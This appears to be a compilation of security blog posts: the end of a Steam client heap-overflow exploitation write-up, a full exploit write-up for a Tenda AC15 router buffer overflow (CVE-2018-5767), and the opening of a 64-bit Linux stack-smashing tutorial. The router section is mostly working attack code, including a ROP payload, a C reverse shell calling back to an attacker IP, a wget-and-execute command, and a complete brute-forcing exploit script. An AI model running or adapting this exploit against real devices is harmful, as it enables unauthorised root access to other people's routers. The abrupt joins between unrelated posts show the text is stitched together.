Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c &lt;&lt; 12)
system = struct.pack(«&lt;I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«&lt;I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«&lt;I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware &amp;&amp; chmod 777 /tmp/malware &amp;&amp; /tmp/malware &amp;;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA\220\001\n")
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
